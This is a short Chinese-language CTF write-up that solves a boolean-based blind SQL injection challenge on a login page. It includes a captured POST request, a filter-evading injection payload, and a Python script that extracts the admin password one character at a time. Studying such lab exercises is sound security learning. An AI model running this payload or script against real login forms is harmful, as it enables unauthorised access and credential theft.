[CTF]基于布尔的SQL盲注

---

前言

[CTF学习]基于布尔的SQL盲注

---

一、题目

提　　示: 基于布尔的SQL盲注
描　　述: sql注入

访问题目，又是一个web login登陆界面，根据提示可以大概猜测是一个sql post注入题。

二、解题步骤

1.bp抓包

POST /index.php HTTP/1.1
Host: 114.67.246.176:10965
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://114.67.246.176:10965/
Cookie: PHPSESSID=j4u9u18ei1r7serqv1vhg9km34
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

username=admin&password=123
#当username=admin时提示password error
#可知用户名为 admin
#对username进行注入时，发现<>=都被过滤了，不过or没有被过滤
#我这边使用username=a'or(1) or(0)%23 进行sql注入判断
#将用户名故意输错来获得回显判断

构造payload

username=admi'or((ascii(substr((select(password))from(1)))-48))%23&password=123

2、python脚本

import requests
import time

url = "http://pandarking.ctf:10965/index.php"
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
}
with requests.session() as s:
    database = "passwd:"
    s.keep_alive = False
    s.adapters.DEFAULT_RETRIES = 5
    for i in range(1,32):
        for j in range(48,128):
            sql = 'admi\'or((ascii(substr((select(password))from({0})))-{1}))--\''.format(i,j)
            
            data = {'username':sql,'password':"123"}
            try:
                res = s.post(url,data=data,timeout=5,headers=headers)
            except:
                time.sleep(2)
                res = s.post(url,data=data,timeout=5,headers=headers)
            if 'username does not exist' in res.text:                
                database += chr(j)
                print(database)
                break
            res.close()
 
#得到 passwd:4dcc88f8f1bc05e7c2ad1a60288481a

3、登陆后台得到flag

谢谢观看